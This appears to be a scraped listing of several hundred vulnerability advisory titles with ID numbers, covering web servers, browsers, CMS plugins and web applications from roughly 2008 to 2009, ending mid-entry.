LiteSpeed Web Server Multiple Unspecified Remote Security Vulnerabilities [36256] Ipswitch WhatsUp Gold 'NMWebService.exe' Remote Denial of Service Vulnerability [36202] Opera Web Browser prior to 10 Multiple Security Vulnerabilities [36166] TurnkeyForms Web Hosting Directory Login SQL Injection Vulnerability [36163] IBM WebSphere Application Server 'CSIv2' Security Bypass Vulnerability [36160] IBM WebSphere Commerce Before 6.0.0.7 Multiple Unspecified Security Vulnerabilities [36159] IBM WebSphere Application Server SCA Security Bypass Vulnerability [36158] IBM WebSphere Application Server Single Sign On Security Bypass Vulnerability [36157] IBM WebSphere Application Server for z/OS File Permission Vulnerability [36156] IBM WebSphere Application Server Migration Component Trace Information Disclosure Vulnerability [36155] IBM WebSphere Application Server 'ibm-portlet-ext.xmi' Security Bypass Vulnerability [36154] IBM Websphere Server Weak Password Obfuscation Denial Of Service Vulnerability [36153] IBM WebSphere Application Server wsadmin Security Bypass Vulnerability [36151] IBM WebSphere Commerce Unspecified Information Disclosure Vulnerability [36091] Squid Web Proxy Cache Authentication Header Parsing Remote Denial of Service Vulnerability [36058] IBM WebSphere Partner Gateway Console SQL Injection Vulnerability [36026] WebKit International Domain Name URI Spoofing Vulnerability [36024] WebKit 'pluginspace' URI Scheme Remote Information Disclosure Vulnerability [36023] WebKit Floating Point Number Remote Buffer Overflow Vulnerability [36022] Apple Safari Top Site Feature Website Promotion Security Vulnerability [35992] Microsoft Office Web Components ActiveX Control Stack Buffer Overflow Code Execution Vulnerability [35990] Microsoft Office Web Components ActiveX Control Memory Allocation Code Execution Vulnerability [35953] Drupal Webform Report Module Webform Submission HTML Injection Vulnerability [35945] Sun JRE/JDK Java Web Start ActiveX Control ATL Remote Code Execution Vulnerability [35932] Palm WebOS Email Notification System 'FROM' Field Arbitrary Script Code Injection Vulnerability [35878] TYPO3 Webesse Image Gallery Extension Unspecified SQL Injection Vulnerability [35877] TYPO3 Webesse E-Card Extension Unspecified Cross Site Scripting Vulnerability [35871] Miniweb Site Builder Module Multiple Cross Site Scripting Vulnerabilities [35870] Miniweb Survey Pro Module SQL Injection and Cross Site Scripting Vulnerabilities [35869] Intesync LLC Miniweb Publisher Module SQL Injection and Cross Site Scripting Vulnerabilities [35786] Palm WebOS Unspecified URL Processing Denial of Service Vulnerability [35783] CommuniGate Pro Web Mail URI Parsing HTML Injection Vulnerability [35741] IBM WebSphere Application Server Stax XMLStreamWrite Security Bypass Vulnerability [35706] Cisco Unified Contact Center Express CRS Administration Interface Directory Traversal Vulnerability [35674] Oracle WebLogic Server CVE-2009-1974 Remote Vulnerability [35673] Oracle Weblogic Server 'console-help.portal' Cross Site Scripting Vulnerability [35665] Hitachi Web Server Client SSL Certificate Handling Unspecified Vulnerability [35663] Hitachi Web Server Reverse Proxy Remote Denial of Service Vulnerability [35642] Microsoft Office Web Components ActiveX Control 'msDataSourceObject()' Code Execution Vulnerability [35610] IBM WebSphere Application Server JAX-RPC WS-Security Security Bypass Vulnerability [35607] WebKit Numeric Character References Remote Memory Corruption Vulnerability [35594] IBM WebSphere Application Server JAX-WS Application Security Bypass Vulnerability [35592] Citrix XenCenterWeb Multiple Input Validation Vulnerabilities [35577] Sun Java System Web Server '.jsp' File Information Disclosure Vulnerability [35571] Opera Web Browser 'javascript:' URI in 'Refresh' Header Cross-Site Scripting Vulnerability [35537] BIGACE Web CMS 'cmd' Parameter Local File Include Vulnerability [35530] Pidgin OSCAR Protocol Web Message Denial of Service Vulnerability [35528] Palm WebOS Prior to 1.0.4 Multiple Vulnerabilities [35513] Sun Java Web Console Cross Site Scripting Vulnerability [35490] IBM Rational ClearQuest CQWeb Server Cross Site Scripting and Information Disclosure Vulnerabilities [35476] Cisco ASA Appliance WebVPN DOM Wrapper Cross Site Scripting Vulnerability [35475] Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Vulnerability [35441] WebKit 'parent/top' Cross Domain Scripting Vulnerability [35412] Multiple Browsers Web Proxy Redirect Handling Man In The Middle Vulnerability [35406] IBM WebSphere Application Server 'IsSecurityEnabled' Flag Information Disclosure Vulnerability [35405] IBM WebSphere Application Server Multiple Security Vulnerabilities [35374] Uebimiau Webmail 'admin/editor.php' Arbitrary File Overwrite Vulnerability [35368] Webmedia Explorer Multiple Cross Site Scripting Vulnerabilities [35350] WebKit Java Applet Remote Code Execution Vulnerability [35349] WebKit Web Inspector Page Privilege Cross Domain Scripting Vulnerability [35348] WebKit Web Inspector Cross Site Scripting Vulnerability [35340] WebKit Custom Cursor and Adjusting CSS3 Hotspot Properties Browser UI Element Spoofing Vulnerability [35336] phpWebThings 'fdown.php' SQL Injection Vulnerability [35334] WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability [35333] WebKit File Enumeration Information Disclosure Vulnerability [35332] WebKit 'about:blank' Security Bypass Vulnerability [35331] WebKit 'Canvas' SVG Image Capture Remote Information Disclosure Vulnerability [35330] WebKit JavaScript Prototypes Cross Site Scripting Vulnerability [35328] WebKit Frame Transition Cross Domain Scripting Vulnerability [35327] WebKit 'Location' and 'History' Objects Cross Site Scripting Vulnerability [35325] WebKit JavaScript DOM User After Free Remote Code Execution Vulnerability [35322] WebKit 'Canvas' HTML Element Image Capture Remote Information Disclosure Vulnerability [35321] WebKit XML External Entity Information Disclosure Vulnerability [35320] WebKit HTML 5 Standard Method Cross Site Scripting Vulnerability [35319] WebKit 'document.implementation' Cross Domain Scripting Vulnerability [35318] WebKit CSS 'Attr' Function Remote Code Execution Vulnerability [35317] WebKit Subframe Click Jacking Vulnerability [35315] WebKit JavaScript 'onload()' Event Cross Domain Scripting Vulnerability [35313] phpWebThings 'module' Parameter Local File Include Vulnerability [35311] WebKit JavaScript Exception Handling Remote Code Execution Vulnerability [35310] WebKit 'Attr' DOM Objects Remote Code Execution Vulnerability [35309] WebKit JavaScript Garbage Collector Memory Corruption Vulnerability [35284] WebKit 'Document()' Function Remote Information Disclosure Vulnerability [35283] WebKit XSLT Redirects Remote Information Disclosure Vulnerability [35272] WebKit Drag Event Remote Information Disclosure Vulnerability [35271] WebKit DOM Event Handler Remote Memory Corruption Vulnerability [35270] WebKit 'XMLHttpRequest' HTTP Response Splitting Vulnerability [35264] Kerio MailServer WebMail Cross Site Scripting Vulnerability [35232] Microsoft IIS 5.0 WebDAV Authentication Bypass Vulnerability [35217] Sun GlassFish Enterprise Server HTTP Engine/Admin Interface Local Denial of Service Vulnerability [35216] Hitachi Web Server Reverse Proxy Denial of Service Vulnerability [35204] Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting Vulnerability [35197] Drupal Webform Module HTML Injection Vulnerability [35170] IBM WebSphere MQ Remote Buffer Overflow Vulnerability [35142] Linksys WAG54G2 Web Management Console Remote Arbitrary Shell Command Injection Vulnerability [35136] IBM WebSphere Partner Gateway 'bcgarchive' Information Disclosure Vulnerability [35105] Ston3D S3DPlayer Web and Standalone 'system.openURL()' Remote Command Injection Vulnerability [35068] Web Conference Room Free Unspecified Cross Site Scripting Vulnerability [35066] Novell GroupWise WebAccess Multiple Security Vulnerabilities [35061] Novell GroupWise WebAccess 'gw/webacc' Multiple Cross-Site Scripting Vulnerabilities [35053] Profense Web Application Firewall Security Bypass Vulnerabilities [35047] CGI Rescue Web Mailer HTTP Header Injection Vulnerability [35043] Realty Web-Base 'list_list.php' Parameter SQL Injection Vulnerability [35038] Kingsoft Webshield Cross Site scripting and Remote Command Execution Vulnerability [35018] Creative Web Solutions Multiple level CMS SQL Injection Vulnerabilities [35012] ClanWeb 'save.php' Remote Password Change Vulnerability [34993] Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities [34984] Xerox WorkCentre Webserver Unspecified Remote Command Execution Vulnerability [34924] WebKit SVGList Objects Remote Memory Corruption Vulnerability [34892] TinyWebGallery '/admin/_include/init.php' Local File Include Vulnerability [34888] RTWebalbum 'AlbumId' Parameter SQL Injection Vulnerability [34886] Realty Web-Base 'admin/admin.php' Multiple SQL Injection Vulnerabilities [34862] webSPELL 'getlang.php' SQL Injection Vulnerability [34809] Million Dollar Text Links Administrative Interface Authentication Bypass Vulnerability [34772] Baby Web Server URL File Disclosure Vulnerability [34758] Pablo Software Solutions Quick 'n Easy Web Server Directory Traversal Vulnerability [34751] WebSPELL 'picture.php' Local File Disclosure Vulnerability [34721] DWebPro Directory Traversal Vulnerability and Arbitrary File Disclosure Vulnerability [34687] WebPortal CMS Multiple Remote and Local File Include Vulnerabilities [34666] FreeBSD libc Berkley DB Interface Uninitialized Memory Local Information Disclosure Vulnerability [34622] Web Scribble Solutions webClassifieds Insecure Cookie Authentication Bypass Vulnerability [34606] Red Hat Stronghold Web Server Cross Site Scripting Vulnerability [34604] EZ Webitor 'login.php' SQL Injection Vulnerability [34598] Horde IMP and Groupware Webmail Cached PGP Key Spoofing Vulnerability [34595] webSPELL BBCode HTML Injection Vulnerability [34577] eLitius Administrative Interface Authentication Bypass Vulnerability [34576] WebCollab 'tasks.php' Cross Site Scripting Vulnerability [34567] WEBBDOMAIN WebShop SQL Injection and Cross Site Scripting Vulnerabilities [34565] MiniWeb Source Code Information Disclosure Vulnerability [34563] MiniWeb Remote Buffer Overflow Vulnerability [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities [34538] FreeWebShop 'startmodules.inc.php' Local File Include Vulnerability [34529] @Mail and @Mail WebMail Email Body HTML Injection Vulnerability [34523] DivX Web Player 'STRF' Chunk Processing Remote Buffer Overflow Vulnerability [34507] Banshee DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability [34506] IBM WebSphere Application Server XML Digital Signature Unspecified Security Vulnerability [34502] IBM WebSphere Application Server 'UsernameToken' Unspecified Security Vulnerability [34501] IBM WebSphere Application Server Forced Logout Session Hijacking Vulnerability [34492] Yellow Duck Weblog 'include/languages/check.php' Local File Include Vulnerability [34473] Chance-i DiViS DVR System Web Server Directory Traversal Vulnerability [34468] Chance-i DiViS-Web DVR System ActiveX Control 'AddSiteEx()' Buffer Overflow Vulnerability [34462] WebFileExplorer 'body.asp' SQL Injection Vulnerability [34391] Web Help Desk Multiple HTML Injection Vulnerabilities [34358] IBM WebSphere Application Server File Permission Vulnerability [34349] Asbru Web Content Management SQL Injection and Cross Site Scripting Vulnerabilities [34330] IBM WebSphere Application Server Username Token Option Session Hijacking Vulnerability [34327] QtWeb Browser Malformed HTML File Remote Denial of Service Vulnerability [34323] webEdition CMS 'WE_LANGUAGE' Parameter Local File Include Vulnerability [34319] SAP MaxDB 'webdbm' Multiple Cross Site Scripting Vulnerabilities [34311] Hitachi Groupmax World Wide Web Desktop Multiple Unauthorized Access Vulnerabilities [34310] SAP AG SAPgui EAI WebViewer3D ActiveX Control Stack Buffer Overflow Vulnerability [34307] Cisco ASA Appliance WebVPN Cross Site Scripting Vulnerability [34286] RETIRED: Check Point FireWall-1 PKI Web Service Remote Buffer Overflow Vulnerabilities [34259] IBM WebSphere Application Server for z/OS Multiple Vulnerabilities [34254] WeBid 'upldgallery.php' Arbitrary File Upload Vulnerability [34239] Cisco IOS WebVPN/SSLVPN Multiple Denial of Service Vulnerabilities [34206] WebCit Mini_Calendar Component Format String Vulnerability [34116] Kim Websites 'login.php' SQL Injection Vulnerability [34104] IBM WebSphere Application Server WAR File Information Disclosure Vulnerability [34074] WeBid 'include_path' Parameter Multiple Remote File Include Vulnerabilities [34066] Multiple Aryanic Products 'includes/web_search.aspx' Cross Site Scripting Vulnerability [34058] WEBJump! Multiple SQL Injection Vulnerabilities [34033] Belkin Bulldog Plus Web Service Buffer Overflow Vulnerability [34016] Amoot Web Directory Password Field SQL Injection Vulnerability [34001] IBM WebSphere Application Server Administrative Console Cross Site Scripting Vulnerability [33979] Easy Web Password '.ewp' File Buffer Overflow Vulnerability [33978] Webformatique Car Manager Joomla! Component 'ItemID' Parameter SQL Injection Vulnerability [33976] Webformatique Reservation Manager Joomla! Component 'ItemID' Parameter SQL Injection Vulnerability [33973] Easy File Sharing Web Server 'thumbnail.php' File Disclosure Vulnerability [33961] Opera Web Browser prior to 9.64 Multiple Security Vulnerabilities [33944] Yektaweb Academic Web Tools CMS Multiple Cross Site Scripting Vulnerabilities [33915] Cisco Unified MeetingPlace Web Conferencing 'E-Mail Address' Field HTML Injection Vulnerability [33905] IBM WebSphere Application Server Cluster Configuration File Information Disclosure Vulnerability [33901] Cisco Unified MeetingPlace Web Conferencing Authentication Bypass Vulnerability [33899] ZNC Webadmin Module Remote Privilege Escalation Vulnerability [33884] IBM WebSphere Application z/OS CSLv2 Identity Assertion Unspecified Local Vulnerability [33879] IBM WebSphere Application Server WSPolicy Information Disclosure Vulnerability [33857] IBM WebSphere MQ Queue Manager Multiple Local Privilege Escalation Vulnerabilities [33849] IBM WebSphere Application Server Installation Factory Information Disclosure Vulnerability [33839] IBM WebSphere Partner Gateway RNIF Document Security Bypass Vulnerability [33838] GoAhead WebServer Authentication Bypass and Multiple Denial of Service Vulnerabilities [33832] Fujitsu Jasmine2000 Enterprise Edition WebLink HTTP Response Splitting Vulnerability [33819] IBM WebSphere Message Broker Information Disclosure Vulnerability [33804] WebKit XMLHttpRequest Cookie Information Disclosure Vulnerability [33746] Scripts Den Dating Website Script 'searchmatch.php' SQL Injection Vulnerability [33705] SnippetMaster Webpage Editor Cross Site Scripting and Remote File Include Vulnerabilities [33701] WebFrame Local and Remote File Include Vulnerabilities [33700] IBM WebSphere Application Server Multiple Vulnerabilities [33687] Trend Micro Interscan Web Security HTTP Proxy Authentication Information Disclosure Vulnerability [33679] Trend Micro InterScan Web Security Suite Multiple Security Bypass Vulnerabilities [33677] FotoWeb Multiple Cross Site Scripting Vulnerabilities [33663] BlackBerry Application Web Loader ActiveX Control Remote Buffer Overflow Vulnerability [33604] Squid Web Proxy Cache HTTP Version Number Parsing Denial of Service Vulnerability [33590] WEBalbum 'photo.php' SQL Injection Vulnerability [33585] NaviCOPA Web Server Remote Buffer Overflow and Source Code Information Disclosure Vulnerabilities [33542] PHP 'mbstring.func_overload' Webserver Denial Of Service Vulnerability [33541] Novell GroupWise WebAccess 'gw/webacc' Multiple Cross-Site Scripting Vulnerabilities [33537] Novell GroupWise WebAccess Unspecified HTML Injection Vulnerability [33533] IBM WebSphere Application Server Arbitrary File Information Disclosure Vulnerability [33531] Xerox WorkCentre Webserver Unspecified Remote Command Execution Vulnerability [33515] Web on Windows ActiveX 'WriteIniFileString/ShellExecute' Arbitrary File Overwrite Vulnerability [33492] Horde IMP Webmail Client Cross Site Scripting And HTML Injection Vulnerabilities [33476] Flaxweb Article Manager Avatar Arbitrary File Upload Vulnerability [33465] SAP NetWeaver and Web Dynpro Portal Cross-Site Scripting Vulnerability [33429] MacsDesign Studio Web Help Desk Cross Site Scripting Vulnerability [33423] Ewebb Web-Calendar Lite Multiple SQL Injection Vulnerabilities [33422] Flaxweb Article Manager 'category.php' SQL Injection Vulnerability [33372] Roundcube Webmail Background Attributes Email Message HTML Injection Vulnerability [33343] WebSVN Known Path Access Restriction Security Bypass Vulnerability [33341] 53KF Web IM 'msg' Parameter Cross Site Scripting Vulnerability [33314] DMXReady Blog Manager 'inc_weblogmanager.asp' Cross-Site Scripting and SQL Injection Vulnerabilities [33243] Multiple Office OCX ActiveX Controls 'OpenWebFile()' Arbitrary Program Execution Vulnerability [33215] Git gitweb Unspecified Remote Command Execution Vulnerability [33169] IBM WebSphere DataPower XML Security Gateway XS40 Remote Denial Of Service Vulnerability [33107] webSPELL Multiple SQL Injection Vulnerabilities [33106] plxWebDev plx Autoreminder 'members.php' SQL Injection Vulnerability [33084] ASPThai.Net Webboard 'bview.asp' SQL Injection Vulnerability [33080] Apple Safari WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability [33069] Pixel8 Web Photo Album 'Photo.asp' SQL Injection Vulnerability [33053] SaschArt SasCam Webcam Server ActiveX Control 'Get' Method Buffer Overflow Vulnerability [33033] AlstraSoft Web Email Script Enterprise 'id' Parameter SQL Injection Vulnerability [33028] Web Scribble Solutions webClassifieds Multiple SQL Injection Vulnerabilities [33016] SapporoWorks BlackJumboDog Web Server Unspecified Authentication Bypass Vulnerability [32982] TYPO3 WEBERkommunal Facilities Extension Unspecified SQL Injection Vulnerability [32969] Merak Mail Server and Webmail Email Message HTML Injection Vulnerability [32967] Git gitweb 'diff.external' Local Privilege Escalation Vulnerability [32936] Extract Website 'download.php' Local File Include Vulnerability [32928] webcamXP URL Directory Traversal Vulnerability [32927] Fujitsu-Siemens WebTransactions Unspecified Remote Command Execution Vulnerability [32915] Phpclanwebsite Multiple Input Validation Vulnerabilities [32908] EasySiteNetwork Jokes Complete Website 'joke.php' SQL Injection Vulnerability [32892] Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability [32891] Opera Web Browser HTML Parsing Heap-Based Remote Code Execution Vulnerability [32864] Opera Web Browser prior to 9.63 Multiple Security Vulnerabilities [32863] Kerio MailServer WebMail Multiple Cross Site Scripting Vulnerabilities [32829] WebPhotoPro Multiple SQL Injection Vulnerabilities [32823] CMS ISWEB SQL Injection and Cross Site Scripting Vulnerabilities [32819] RETIRED: Intesync LLC Miniweb 2.0 'username' Parameter SQL Injection Vulnerability [32792] IBM WebSphere Portal and Workplace Web Content Management Unspecified Security Bypass Vulnerability [32771] Sun Java Web Console Unspecified URI Redirection Vulnerability [32770] Sun Java System Portal Server Web Console Information Disclosure Vulnerability [32756] unscripts UN Webmaster Marketplace 'member.php' SQL Injection Vulnerability [32704] WebCAF Multiple Input Validation Vulnerabilities [32679] IBM WebSphere Application Server Multiple Unspecified Vulnerabilities [32665] Linksys WVC54GC 'NetCamPlayerWeb11gv2.ocx' ActiveX Control Buffer Overflow Vulnerability [32635] PHPSTREET Webboard 'show.php' SQL Injection Vulnerability [32620] Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities [32616] Rae Media Web Based Contact Management Login SQL Injection Vulnerability [32602] WebGUI 'lib/WebGUI/Storage.pm' Remote Script Code Execution Vulnerability [32576] IBM Rational ClearQuest Web Multiple Unspecified Cross Site Scripting Vulnerabilities [32570] PHP JOBWEBSITE PRO 'forgot.php' SQL Injection and Cross Site Scripting Vulnerabilities [32551] ActiveWebSoftwares Active Business Directory 'default.asp' SQL Injection Vulnerability [32550] ActiveWebSoftwares Active Price Comparison 'links.asp' SQL Injection Vulnerability [32548] ActiveWebSoftwares Active Web Helpdesk 'default.asp' SQL Injection Vulnerability [32547] ActiveWebSoftwares Active Test Multiple SQL Injection Vulnerabilities [32546] ActiveWebSoftwares Active Web Mail Multiple SQL Injection Vulnerabilities [32544] ActiveWebSoftwares Active Bids 'bidhistory.asp' SQL Injection Vulnerability [32541] ActiveWebSoftwares ActiveVotes 'VoteHistory.asp' SQL Injection Vulnerability [32534] ActiveWebSoftwares ASPReferral 'Merchantsadd.asp' SQL Injection Vulnerability [32533] Multiple ActiveWebSoftwares Products Login Parameters SQL Injection Vulnerabilities [32520] Web Calendar System SQL Injection and Cross Site Scripting Vulnerabilities [32515] Livio.net WEB Calendar Cross Site Scripting and Multiple SQL Injection Vulnerabilities [32507] Web Calendar Pro 'admin.php' SQL Injection Vulnerability [32473] RSA enVision Platform Web Console Password Hash Remote Information Disclosure Vulnerability [32454] Bandwebsite 'info.php' Cross Site Scripting Vulnerability [32453] Bandwebsite 'lyrics.php' SQL Injection Vulnerability [32449] Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability [32412] Apple iPhone Configuration Web Utility for Windows Directory Traversal Vulnerability [32408] IBM Lotus Web Content Management Unspecified Cross Site Scripting Vulnerabilities [32323] Opera Web Browser 'file://' Heap Based Buffer Overflow Vulnerability [32301] AlstraSoft Web Hosting Directory Multiple Vulnerabilities [32299] Bankoi Webhost Panel 'login.asp' SQL Injection Vulnerability [32298] AlstraSoft Web Host Directory 'Password' Parameter SQL Injection Vulnerability [32290] NETGEAR WGR614 Administration Interface Remote Denial of Service Vulnerability [32287] pi3Web ISAPI Directory Remote Denial Of Service Vulnerability [32283] TurnkeyForms Web Hosting Directory Multiple Vulnerabilities [32278] HyperStop WebHost Directory 'admin/login' SQL Injection Vulnerability [32196] Mini Web Calendar Local File Include and Cross-Site Scripting Vulnerabilities [32108] Multiple WEBBDOMAIN Products Login Screen SQL Injection Vulnerability [32097] WEBBDOMAIN Post Card 'choosecard.php' SQL Injection Vulnerability [32092] Multi Languages WebShop Online Cross-Site Scripting and SQL Injection Vulnerabilities [32032] Scripts For Sites EZ Webring/EZ Top Sites 'category.php' SQL Injection Vulnerability [32015] Opera Web Browser 9.62 History Search Input Validation Vulnerability [32011] phpWebSite 'links.php' SQL Injection Vulnerability [31991] Opera Web Browser History Search and Links Panel Cross Site Scripting Vulnerabilities [31977] WebCards 'admin.php' Login Page SQL Injection Vulnerability [31963] H&H Solutions WebSoccer 'id' SQL Injection Vulnerability [31947] WebGUI 'Asset.pm' Perl Module Handling Code Execution Vulnerability [31946] Android Web Browser Unspecified Remote Code Execution Vulnerability [31931] Blender 'BPY_interface.c' Remote Command Execution Vulnerability [31916] Sun Java Web Start Remote Command Execution Vulnerability [31891] WebSVN Multiple Remote Input Validation Vulnerabilities [31869] Opera Web Browser History Search Input Validation Vulnerability [31855] Multiple Vendor Web Browser FTP Client Cross Site Scripting Weakness [31842] Opera Web Browser Multiple Cross Site Scripting Vulnerabilities [31839] IBM WebSphere Application Server Denial of Service And Security Bypass Vulnerabilities [31810] myWebland miniBloggie 'del.php' SQL Injection Vulnerability [31797] WebGUI Security Bypass and Multiple Cross Site Scripting Vulnerabilities [31791] Calendars for the Web Security Bypass Vulnerability [31776] WEB//NEWS Multiple SQL Injection Vulnerabilities [31766] Symantec Altiris Deployment Solution Client User Interface Local Privilege Escalation Vulnerability [31765] Microsoft Outlook Web Access for Exchange Server 'redir.asp' URI Redirection Vulnerability [31762] PhpWebGallery 'comments.php' SQL Injection and Code Execution Vulnerabilities [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability [31755] Webscene eCommerce 'productlist.php' SQL Injection Vulnerability [31746] Websense Reporter 'CreateDbInstall.log' Local Information Disclosure Vulnerability [31740] ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability [31718] Apple Mac OS X Server Weblog Access Control List Security Bypass Vulnerability [31703] Nokia Web Browser for S60 Infinite Array Sort Denial of Service Vulnerability [31691] Sun Java System Web Proxy Server FTP Subsytem Heap Based Buffer Overflow Vulnerability [31655] WebBiscuits Modules Controller Multiple Local and Remote File Include Vulnerabilities [31645] Avaya Communication Manager Web Administration Multiple Security Vulnerabilities [31639] Avaya Communication Manager Web Server Configuration Unauthorized Access Vulnerability [31631] Opera Web Browser URI Redirection Remote Code Execution Vulnerability [31596] MetaGauge Web Server Directory Traversal Vulnerability [31595] PHP Web Explorer Multiple Local File Include Vulnerabilities [31584] K9 Web Protection Authentication Bypass Vulnerabilities [31573] JMweb 'src' Parameter Multiple Local File Include Vulnerabilities [31562] Website Directory 'index.php' Cross-Site Scripting Vulnerability [31544] OLIB7 WebView 'infile' Parameter Local File Include Vulnerability [31543] Blue Coat WebFilter ICAP Patience Page Cross Site Scripting Vulnerability [31524] H-Sphere WebShell 'actions.php' Multiple Cross Site Scripting Vulnerabilities [31510] eZoneScripts Adult Banner Exchange Website 'click.php' SQL Injection Vulnerability [31476] Mozilla Firefox User Interface Dispatcher Null Pointer Dereference Denial of Service Vulnerability [31450] ParsaGostar ParsaWeb Multiple SQL Injection Vulnerabilities [31425] PromoteWeb MySQL 'go.php' SQL Injection Vulnerability [31424] Ultimate Webboard 'webboard.php' SQL Injection Vulnerability [31414] IBM Tivoli Netcool/Webtop Privilege Escalation Vulnerability [31412] Computer Associates Service Desk Web Forms Multiple Cross-Site Scripting Vulnerabilities [31371] web-cp 'sendfile.php' Information Disclosure Vulnerability [31353] WebPortal CMS 'index.php' Remote Code Execution Vulnerability [31343] JETIK-WEB 'sayfa.php' SQL Injection Vulnerability [31341] Sofi WebGUI 'modstart.php' Remote File Include Vulnerability [31272] Epic Games Unreal Tournament 3 UT3 WebAdmin Directory Traversal Vulnerability [31267] LooYu Web IM Cross Site Scripting Vulnerability [31249] HyperStop WebHost Directory Database Disclosure Vulnerability [31245] Kantan WEB Server Unspecified Directory Traversal Vulnerability [31244] Kantan WEB Server Unspecified Cross Site Scripting Vulnerability [31225] x10 Automatic MP3 Script 'web_root' Parameter Multiple Remote File Include Vulnerabilities [31223] Mercurial hgweb 'allowpull' Information Disclosure Vulnerability [31192] PreProjects Real Estate Website 'search.php' SQL Injection Vulnerability [31186] IBM WebSphere Application Server 'FileServing' Feature Unspecified Vulnerability [31183] Opera Web Browser Unicode Whitespace Cross-Site Scripting Weakness [31156] WebPortal CMS 'download.php' SQL Injection Vulnerability [31153] WebCMS Portal Edition Multiple Input Validation Vulnerabilities [31142] Sports Clubs Web Panel 'id' Parameter Multiple SQL Injection Vulnerabilities [31128] Sports Clubs Web Panel 'index.php' Local File Include Vulnerability [31123] PhpWebGallery Local File Include and Cross-Site Scripting Vulnerabilities [31096] Peachtree Accounting 'PAWWeb11.ocx' ActiveX Control Insecure Method Vulnerability [31061] Apple iPhone and iPod touch Safari WebKit 'alert()' Function Remote Denial of Service Vulnerability [31028] eZoneScripts Dating Website Remote File Upload Vulnerability [31006] Webservice-DIC shop_v50 And shop_v52 Multiple Cross-Site Scripting Vulnerabilities [30996] aspWebAlbum Multiple Input Validation Vulnerabilities [30992] @Mail and @Mail WebMail Multiple Cross-Site Scripting Vulnerabilities [30950] WeBid 'config.php' Arbitrary File Upload Vulnerability [30946] Websens CMSbright 'page.php' SQL Injection Vulnerability [30945] WeBid Multiple Input Validation Vulnerabilities [30941] SourceWorkshop Web directory script 'index.php' SQL Injection Vulnerability [30867] Mono 'System.Web' HTTP Header Injection Vulnerability [30833] Civic Website Manager Multiple Cross-Site Scripting Vulnerabilities [30822] PHP-Ultimate Webboard 'admindel.php' Multiple Input Validation Vulnerabilities [30807] Web Directory Script 'listing_view.php' SQL Injection Vulnerability [30792] Trend Micro Web Management Authentication Bypass Vulnerability [30780] Fujitsu Web-Based Admin View Directory Traversal Vulnerability [30778] webEdition CMS 'we_objectID' Parameter SQL Injection Vulnerability [30768] Opera Web Browser 9.51 Multiple Security Vulnerabilities [30745] K Web CMS 'sayfala.asp' SQL Injection Vulnerability [30673] Meet#Web 'root_path' Parameter Multiple Remote File Include Vulnerabilities [30671] Sun Java System Web Proxy Server FTP Subsystem Denial of Service Vulnerability [30578] WebEx Meeting Manager 'atucfobj.dll' ActiveX Control Remote Buffer Overflow Vulnerability [30572] Multiple WebmasterSite Products Remote Command Execution Vulnerability [30545] Anzio Web Print Object ActiveX Control Remote Buffer Overflow Vulnerability [30500] IBM WebSphere Portal Server Remote Administration Authentication Bypass Vulnerability [30464] Blue Coat K9 Web Protection Centralized Server HTTP Responses Buffer Overflow Vulnerability [30463] Blue Coat K9 Web Protection 'Referer' Header Stack Based Buffer Overflow Vulnerability [30451] Sun Java System Web Server 7.0 Plugin for Sun N1SPS Remote Authentication Bypass Vulnerability [30447] DEV Web Management System Multiple Input Validation Vulnerabilities [30431] PhpWebGallery Information Disclosure Vulnerability [30408] Web Wiz Rich Text Editor 'RTE_popup_link.asp' Cross Site Scripting Vulnerability [30398] Web Wiz Forums 'mode' Parameter Multiple Cross-Site Scripting Vulnerabilities [30383] phpwebnews-mysql Multiple SQL Injection Vulnerabilities [30382] Mobius Web Publishing Software Multiple SQL Injection Vulnerabilities [30343] EZWebAlbum Cookie Authentication Bypass Vulnerability [30311] EZWebAlbum 'download.php' Local File Include Vulnerability [30283] LunarNight Laboratory WebProxy Cross Site Scripting Vulnerability [30280] IBM WebSphere Application Server 'PropFilePasswordEncoder' Unspecified Vulnerability [30265] Citrix XenServer XenAPI HTTP Interfaces Cross-Site Scripting Vulnerability [30247] Galatolo WebManager Cookie Authentication Bypass Vulnerability [30237] Comdev Web Blogger 'arcmonth' Parameter SQL Injection Vulnerability [30232] Galatolo Web Manager SQL Injection and Cross-Site Scripting Vulnerabilities [30209] Maian Weblog 'weblog_cookie' Authentication Bypass Vulnerability [30204] WebCMS Portal Edition 'index.php' SQL Injection Vulnerability [30191] Apple Xcode WebObjects 'WOHyperlink' Information Disclosure Vulnerability [30176] phpDatingClub 'website.php' Local File Include Vulnerability [30164] V-webmail Multiple Remote File Include Vulnerabilities [30162] V-webmail Multiple Remote File Include Vulnerabilities [30151] Xerox CentreWare Web Multiple SQL Injection and Cross-Site Scripting Vulnerabilities [30148] Sun Java Web Start Multiple Vulnerabilities [30130] Microsoft Outlook Web Access for Exchange Server Email Field Cross-Site Scripting Vulnerability [30117] WebXell Editor 'upload_pictures.php' Arbitrary File Upload Vulnerability [30080] phpwebnews 'bukutamu.php' SQL Injection Vulnerability [30079] phpwebnews 'index.php' SQL Injection Vulnerability [30078] Microsoft Outlook Web Access for Exchange Server HTML Parsing Cross-Site Scripting Vulnerability [30074] WebBlizzard CMS 'index.php' SQL Injection Vulnerability [30068] Opera Web Browser Remote Code Execution and Information Disclosure Vulnerabilities [30060] Joomla! and Mambo Brightcode Weblinks Component 'catid' Parameter SQL Injection Vulnerability [30027] Wordtrans-web Remote Arbitrary Shell Command Injection Vulnerability [30006] Joomla! and Mambo 'com_xewebtv' Component 'id' Parameter SQL Injection Vulnerability [29971] Keller Web Admin 'action' Parameter Local File Include Vulnerability [29970] EasySiteNetwork Cheats Complete Website 'item.php' SQL Injection Vulnerability [29969] EasySiteNetwork Drinks Complete Website 'drink.php' SQL Injection Vulnerability [29968] EasySiteNetwork Jokes Complete Website 'joke.php' SQL Injection Vulnerability [29967] EasySiteNetwork Tips Complete Website 